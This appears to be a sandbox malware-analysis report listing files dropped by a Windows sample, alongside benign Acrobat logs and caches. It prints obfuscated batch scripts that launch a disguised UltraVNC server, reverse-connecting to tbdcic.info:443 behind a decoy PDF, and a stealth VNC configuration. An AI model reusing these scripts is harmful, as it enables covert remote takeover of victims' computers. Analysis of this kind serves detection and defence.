                                                                          Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"62d4a8e8de356c982906349932008ca2","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734957499000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"b6f71618fd6b36bc9bbe9bcfff6415d1","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734957499000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"dbe56fb0a1f1eb7eed99c6ba14b65e5d","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734957499000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"ead6c34d6bc36c39e9cd71edd2a8a85d","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734957499000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"27231bb69b098da53cf19950ef2379fc","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734957499000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"c762b17fc5b2565ea352698aeb8956ce","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                          Category:dropped
                                                                          Size (bytes):12288
                                                                          Entropy (8bit):1.318604986365352
                                                                          Encrypted:false
                                                                          SSDEEP:48:TGufl2GL7ms9WR1CPmPbPahLHwypilIJHW:lNVms9WfMwbPah0T
                                                                          MD5:694DD6D93CBCA89DBD51951B8E9FC6CB
                                                                          SHA1:96E2E7D01135C8F2901E41B3DC6CCD69E685FE79
                                                                          SHA-256:CA866FE2C7C5EC4BD3312446DCC0A25D592A0DFBD9A56F10407687FA68C2CC44
                                                                          SHA-512:90B9F79EC759A351E51E54644B455B44CE2A6A753150041FE25F6C591FF8582298B80BB9AA1AD5BF624EBED8BE71DFB23D70D3266F6BC3361128E343FC2A8682
                                                                          Malicious:false
                                                                          Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:SQLite Rollback Journal
                                                                          Category:dropped
                                                                          Size (bytes):8720
                                                                          Entropy (8bit):1.7818086772187525
                                                                          Encrypted:false
                                                                          SSDEEP:48:7MjWR1CPmPbPahLH1ypilIUqFl2GL7msw:7qWfMwbPahRRKVmsw
                                                                          MD5:99154E478C696FBCEF433670652978F1
                                                                          SHA1:A1C352266F8A5F09F773AC6CCBF184BAA808E845
                                                                          SHA-256:FDBD3198C3852BEEC1FFBB808FF1A0C73832C261FDA7C40DAE2498AC34BCF173
                                                                          SHA-512:BF9D6FACCA9E8D485B6553CF32F75EF9755245E5C9CAB1AA5830097F9FA65E4C2D2ED56FD9DF5C32ECD12DCA5B9A20D53ADE379E4BAABF66556FF6CC2E5D6014
                                                                          Malicious:false
                                                                          Preview:.... .c......$.>..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................^..^.^.^.^.^.^.^.p.p.p.p.p.p.p.p.p.p..........................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):66726
                                                                          Entropy (8bit):5.392739213842091
                                                                          Encrypted:false
                                                                          SSDEEP:768:RNOpblrU6TBH44ADKZEg5xSCfjoBTRhE7sNvzJMN0tJVuYyu:6a6TZ44ADE5xSCfcBTRmIJuK
                                                                          MD5:D5DA9D64D90658AC05ED43EA2F65073A
                                                                          SHA1:74DD8E562B5947012FB1AE8508F92D8F40AD87EC
                                                                          SHA-256:C5301378202B8390F30D2B3AC332B37BE9A6BC8B73F429372E79452FC6FCF2A1
                                                                          SHA-512:1202460654B636670E549DADD2E78BA8A87CA7899480544AE8D75F912136C987BDA3EE211A81A2317A793414D374603B54FAE48D9E9AFF23C0EA18844A3EC729
                                                                          Malicious:false
                                                                          Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

                                                                          C:\Users\user\AppData\Local\Temp\7ZipSfx.000\3889122.Khe9oLY

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\T8xrZb7nBL.exe
                                                                          File Type:DOS batch file, ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):503
                                                                          Entropy (8bit):5.353292454999417
                                                                          Encrypted:false
                                                                          SSDEEP:12:5YVJl5uPdbHjjQxSyQL+kKqWuocWFfH61w26SgPQmPZC:gl5ubEpo+kKIpOP2g50
                                                                          MD5:41F0189B83E9D493B86D7182B3514F9D
                                                                          SHA1:D4EC6020DE07E7D10552189CE4025B220467A522
                                                                          SHA-256:7653F9CB0A81E850998E4E171FC72B99765F198A0E5CA2AF51EE698137E242FA
                                                                          SHA-512:AA941D46D50737B3A8179C27631814852BAE90601349D6BE7B769486CF6189254209758183BC59B34DE20BCC64047AA45AFE62104B08E0C6413753CCED55CC92
                                                                          Malicious:false
                                                                          Preview:@echo off.setlocal enabledelayedexpansion.set QEy79=browser_sn.set Mkr26=co.set ReO81=nhost.set dUEeo=443.set wP5sf=%COMPUTERNAME%.set LtQEq=co.set Eqm2m=nne.set wapw9=ct.set Gruna=tbdcic.info.set oSLdS=exe.set jSEQA=autore.set HaGkC=194.87.252.28.timeout /t 1.taskkill /f /im %QEy79%.%oSLdS% .timeout /t 2.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% .timeout /t 8.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% -%jSEQA%%LtQEq%%Eqm2m%%wapw9% -id:%wP5sf%_Jd0Qd -%LtQEq%%Eqm2m%%wapw9% %Gruna%:443.timeout /t 4.exit.

                                                                          C:\Users\user\AppData\Local\Temp\7ZipSfx.000\9655269573

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\T8xrZb7nBL.exe
                                                                          File Type:DOS batch file, ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):1001
                                                                          Entropy (8bit):5.502266483327757
                                                                          Encrypted:false
                                                                          SSDEEP:24:g5byOTMorMKXGw+kMLz2NcflizT/P2bkAMlvRx/m:IOOBrMKx8TMzL9vx/m
                                                                          MD5:A99AF3E2449A048C4436329C1AF6F48F
                                                                          SHA1:06C2CB982455A7A2FCB76AE70D7C3ED6871361DA
                                                                          SHA-256:B3571E56EB1A88188B2CE9AC1E67F429E7D949D09528437A7F32689A2371CC78
                                                                          SHA-512:C8AD6E74A0C8D29538042FDC429547AD0FB7E8F96B3E5E59644EFA6837BF243E31A3193F2B385316421730733330F346498044EFC62BA152AC79FC7CD9C7A559
                                                                          Malicious:false
                                                                          Preview:@echo off.setlocal enabledelayedexpansion.set ReO81=nhost.set Eqm2m=nne.set LtQEq=co.set oSLdS=exe.set Tnd6s=Lom.set uXzAr=pdf.set Fl8oQ=raVNC.set wP5sf=%COMPUTERNAME%.set jSEQA=autore.set TNi7V=%WINDIR%\Tasks\3889122.cmd.set Gruna=tbdcic.info.set IXrxR=Jd0Qd.set M6Juw=443.set Mkr26=co.set wapw9=ct.set D7rq9=Ult.set QEy79=browser_sn.set Fr9ND=ini.timeout /t 1.copy "DygIR.vkc0f" "%HOMEPATH%\Downloads\%Tnd6s%.%uXzAr%" & start "" "%HOMEPATH%\Downloads\%Tnd6s%.%uXzAr%".timeout /t 1.taskkill /f /im %QEy79%.%oSLdS% .timeout /t 2.copy "Xv6Ya.d8LhT" "%QEy79%.%oSLdS%".timeout /t 1.copy "go3uE.OUJMA" "%D7rq9%%Fl8oQ%.%Fr9ND%".timeout /t 2.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% .timeout /t 8.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% -%jSEQA%%LtQEq%%Eqm2m%%wapw9% -id:%wP5sf%_%IXrxR% -%LtQEq%%Eqm2m%%wapw9% %Gruna%:%M6Juw%.timeout /t 2.copy "uqVb3.kkb9h" "%Mkr26%%ReO81%.%oSLdS%".timeout /t 4.:loop.if exist "%TNi7V%" (. cmd /c "%TNi7V%". timeout /t 600. goto :loop.) else (. timeout /t 42. goto :loop.).

                                                                          C:\Users\user\AppData\Local\Temp\7ZipSfx.000\DygIR.vkc0f

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\T8xrZb7nBL.exe
                                                                          File Type:PDF document, version 1.5 (zip deflate encoded)
                                                                          Category:dropped
                                                                          Size (bytes):605114
                                                                          Entropy (8bit):7.931189302613814
                                                                          Encrypted:false
                                                                          SSDEEP:12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
                                                                          MD5:A18D0E3EEEF0D6E099BAB52F8B041446
                                                                          SHA1:4879750BEC07AA11629950310AF538E9A9D91D20
                                                                          SHA-256:95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
                                                                          SHA-512:6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
                                                                          Malicious:false
                                                                          Preview:%PDF-1.5.%.....92 0 obj.<</Filter/FlateDecode/Length 3501>>.stream.x..Zmo...>..EA.,..(J.s~..S+.v..^.b.....4...Ea.I..m.4_..;......%0p:......3.......?..w........&/../.........=...en......?...../..m._..v.}T..l..?..g...l.7.A....Nq..z.m..c..Nv...<.........3...s4.C..C...f.....l.0...-.-8...~.c.yi.`y..]...uf.)K.x...1T...Iw...5D..iE.v.a5.t..h.3Z.@..XRgXR..4....A.....a..C.)n.E%...g....d....T.$..?..`Z.>...F....:.aT8].k:|...v.....=+}..O..A.a..z6.D.SU.]'"=.f2...1....`.}R.#.R.4.....<$......Z..agQ....u....V.$~.z5*.?.r.).......'.p..6...l..#~...}....c.8k{/$.Z8G....:..5A.T......M....b.M..._.FE.}.5.........;...e.....j.......E...4...'E.e'..>....u..v...l..?..u.x......_"..-.9.CX.3.#...=....;.......b.j........j*$Y..G......./,..Rh.....m...'9..V.....e.".....Y.{...?g.bi..*...T..0!.k.8q......)...xN{..g.`G..F.0.n~.U!.a..(.!..^...[.d'.?fw....x.h...[.:.*-..#;.lM@.c.+x1......nFK...].>..n@,H..-.C ........*zf.Z.0W-.....5#]...C..8.Pm1Q.8...5.,. ....Ce=....p.5.u!.e.....Q).=.G.

                                                                          C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Xv6Ya.d8LhT

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\T8xrZb7nBL.exe
                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1945368
                                                                          Entropy (8bit):6.532894678367002
                                                                          Encrypted:false
                                                                          SSDEEP:24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
                                                                          MD5:749B3A68B9C5325D592822EE7C2C17EC
                                                                          SHA1:3EDE6BB2DF969432358A5883CF226971FDE8B7D4
                                                                          SHA-256:F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
                                                                          SHA-512:B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Xv6Ya.d8LhT, Author: Joe Security
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
                                                                          • Filename: mSRW5AfJpC.exe, Detection: malicious, Browse
                                                                          • Filename: 7q551ugrWe.exe, Detection: malicious, Browse
                                                                          • Filename: Olz7TmvkEW.exe, Detection: malicious, Browse
                                                                          • Filename: mSRW5AfJpC.exe, Detection: malicious, Browse
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.l.6...6...6.......8...-U......-U..8...-U..r...6...9...?...4...?...7...?...!...6.......-U......-U..7...-U..7...Rich6...........................PE..d....Y,T.........."......|..........4..........@..............................(.....0.....@.............................................................t.......$.............(.........................................................(............................text....{.......|.................. ..`.rdata..,?.......@..................@..@.data....6.......D..................@....pdata..$...........................@..@.rsrc...t...........................@..@.reloc...$....(..&...p..............@..B................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\7ZipSfx.000\go3uE.OUJMA

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\T8xrZb7nBL.exe
                                                                          File Type:Generic INItialization configuration [admin]
                                                                          Category:dropped
                                                                          Size (bytes):858
                                                                          Entropy (8bit):5.233343202654504
                                                                          Encrypted:false
                                                                          SSDEEP:24:z/h28nCi2vMQg9KgJhuXNTxYgMei3MAKJ/nn:rh28nC2/KgJOr8eTx/n
                                                                          MD5:C55EEA597023B8C774986495ECAE5B33
                                                                          SHA1:279315CE36021D2C86AE97EBFAA528749FA89544
                                                                          SHA-256:75490184E52519B37CC1DF17AF419C260BD50575C57FFA46366A877E4FC57ACA
                                                                          SHA-512:D838DA28246C21A3A9920E05B2E5AA58321F5C08D5F18B0F372E9436641977E9A33585706A85A7F84116F27B456C5589E4D2235CB8E178F824483493F508989B
                                                                          Malicious:false
                                                                          Preview:[Permissions]..[admin]..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..RemoveAero=0..DebugMode=0..Avilog=0..path=Y:..DebugLevel=0..AllowLoopback=0..LoopbackOnly=0..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferTimeout=50..KeepAliveInterval=6..SocketKeepAliveTimeout=12000..DisableTrayIcon=1..MSLogonRequired=0..NewMSLogon=0..ConnectPriority=0..QuerySetting=2..QueryTimeout=8..QueryAccept=0..LockSetting=0..RemoveWallpaper=0..RemoveEffects=0..RemoveFontSmoothing=0..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=0..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=..DSMPluginConfig=..primary=1..secondary=0..SocketConnect=0..HTTPConnect=0..XDMCPConnect=0..AutoPortSelect=1..PortNumber=5628..HTTPPortNumber=5800..InputsEnabled=1..[UltraVNC]..passwd=F0341C75FCAEB31BD2..passwd2=F2409C75FCAEB22BD2..

                                                                          C:\Users\user\AppData\Local\Temp\7ZipSfx.000\uqVb3.kkb9h

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\T8xrZb7nBL.exe
                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):867840
                                                                          Entropy (8bit):6.386550733462827
                                                                          Encrypted:false
                                                                          SSDEEP:12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
                                                                          MD5:0F568F6C821565AB9FF45C7457953789
                                                                          SHA1:F948A4C5E01A74B17D0F966615834BA76DC1BADC
                                                                          SHA-256:CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
                                                                          SHA-512:B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
                                                                          • Filename: mSRW5AfJpC.exe, Detection: malicious, Browse
                                                                          • Filename: 7q551ugrWe.exe, Detection: malicious, Browse
                                                                          • Filename: Olz7TmvkEW.exe, Detection: malicious, Browse
                                                                          • Filename: mSRW5AfJpC.exe, Detection: malicious, Browse
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?]T.^3..^3..^3..&...^3..57..^3..50..^3..^2..[3..52..^3..5>.z^3..56..^3..5...^3..5...^3..51..^3.Rich.^3.........PE..d...?...........".................`..........@....................................9g....`.......... .......................................................`......................pB..p.......................(................... ...`............................text...@........................... ..`.rdata..^J.......L..................@..@.data....H..........................@....pdata.......`......................@..@.didat..............................@....rsrc...............................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\MSI475f4.LOG

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):246
                                                                          Entropy (8bit):3.5193370621730837
                                                                          Encrypted:false
                                                                          SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8rOlAkiNUll:Qw946cPbiOxDlbYnuRKDlD0Un
                                                                          MD5:51C93B55C1B3CA606552C234FBA7D293
                                                                          SHA1:9DC2FF490911D42B357E72D997E8D5D8F39010CF
                                                                          SHA-256:F8A45559E848AEE3BA2360B4BFB2AB365941351106371A493FCA9AEC5378F6B0
                                                                          SHA-512:D9844A808B1F9C44A150EEAECC46C02F395E3F929D211390538036F652112662D94475C63613ECA0528C66D8895B563D06CCC6EF5AF443BD52A888EA17D55FBA
                                                                          Malicious:false
                                                                          Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.3./.1.2./.2.0.2.4. . .0.7.:.3.8.:.1.8. .=.=.=.....

                                                                          C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-23 07-38-09-764.log

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:ASCII text, with very long lines (393)
                                                                          Category:dropped
                                                                          Size (bytes):16525
                                                                          Entropy (8bit):5.33860678500249
                                                                          Encrypted:false
                                                                          SSDEEP:384:IC2heaVGJMUPhP80d0Wc+9eG/CCihFomva7RVRkfKhZmWWyC7rjgNgXo6ge5iaW0:X8B
                                                                          MD5:C3FEDB046D1699616E22C50131AAF109
                                                                          SHA1:C9EEA5A1A16BD2CD8154E8C308C8A336E990CA8D
                                                                          SHA-256:EA948BAC75D609B74084113392C9F0615D447B7F4AACA78D818205503EACC3FD
                                                                          SHA-512:845CDB5166B35B39215A051144452BEF9161FFD735B3F8BD232FB9A7588BA016F7939D91B62E27D6728686DFA181EFC3F3CC9954B2EDAB7FC73FCCE850915185
                                                                          Malicious:false
                                                                          Preview:SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:080+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="SetConfig:

                                                                          C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):15114
                                                                          Entropy (8bit):5.379468814733433
                                                                          Encrypted:false
                                                                          SSDEEP:384:gs/AnV2Nn+HNQYW1xcnKQe6ma1wRMZlvvgO3S3E3Y3kGNljiQfQWmW8dXSXuDVhV:Fbs
                                                                          MD5:F5220C13E060B5E9ECE0BFABDB9C4C0C
                                                                          SHA1:B0F77D775501545B920826EF87B4C3A4B4CC4650
                                                                          SHA-256:60069DCF5122E0B254E309082DA5AA8DB3525657FEBE652A2FA51AA3F832F2B6
                                                                          SHA-512:370279707A292753085B196170059105937511E95E212C8DACC16B57B7712B086585BB0B1668A90FAB68144DA8428B286F33CD50AECC4BFC0D3D91AA11603C9A
                                                                          Malicious:false
                                                                          Preview:SessionID=51ef9d75-703c-4abe-b3fa-6ccbd01b7b5f.1734957489785 Timestamp=2024-12-23T07:38:09:785-0500 ThreadID=7616 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=51ef9d75-703c-4abe-b3fa-6ccbd01b7b5f.1734957489785 Timestamp=2024-12-23T07:38:09:786-0500 ThreadID=7616 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=51ef9d75-703c-4abe-b3fa-6ccbd01b7b5f.1734957489785 Timestamp=2024-12-23T07:38:09:787-0500 ThreadID=7616 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=51ef9d75-703c-4abe-b3fa-6ccbd01b7b5f.1734957489785 Timestamp=2024-12-23T07:38:09:787-0500 ThreadID=7616 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=51ef9d75-703c-4abe-b3fa-6ccbd01b7b5f.1734957489785 Timestamp=2024-12-23T07:38:09:787-0500 ThreadID=7616 Component=ngl-lib_NglAppLib Description="SetConf

                                                                          C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):29752
                                                                          Entropy (8bit):5.411466030036088
                                                                          Encrypted:false
                                                                          SSDEEP:192:TcbeIewcbVcbqI4ucbrcbQIrJcb6cbCIC4cbCcbAIdvcbl:ceo4+rsC/do
                                                                          MD5:DCF4EA34109243B0025DBFB445DBBE06
                                                                          SHA1:3951414DC876CC16FB372FBC062FBA7A77A209D9
                                                                          SHA-256:5406B92E55B92920C159710FB5B33CAC3F939107F0ADFDBEC4BF3534A83FB454
                                                                          SHA-512:8D0AA840F94231AAFD038711309DC60468BF6F3626EF4942D4EEE2BAAB570995A0F69D4F66AE1023CA295E5C78248B57178661FEDFFB9DDBF17475FC818305BD
                                                                          Malicious:false
                                                                          Preview:05-10-2023 10:18:29:.---2---..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 10:18:29:.Closing File..05-10-

                                                                          C:\Users\user\AppData\Local\Temp\acrocef_low\072eabdc-8e01-4070-b012-8fd82f9e35bf.tmp

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                          Category:dropped
                                                                          Size (bytes):386528
                                                                          Entropy (8bit):7.9736851559892425
                                                                          Encrypted:false
                                                                          SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                          MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                          SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                          SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                          SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                          Malicious:false
                                                                          Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                                                                          C:\Users\user\AppData\Local\Temp\acrocef_low\ce5efea3-388b-4422-9cc4-8271b0448457.tmp

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                          Category:dropped
                                                                          Size (bytes):758601
                                                                          Entropy (8bit):7.98639316555857
                                                                          Encrypted:false
                                                                          SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                          MD5:3A49135134665364308390AC398006F1
                                                                          SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                          SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                          SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                          Malicious:false
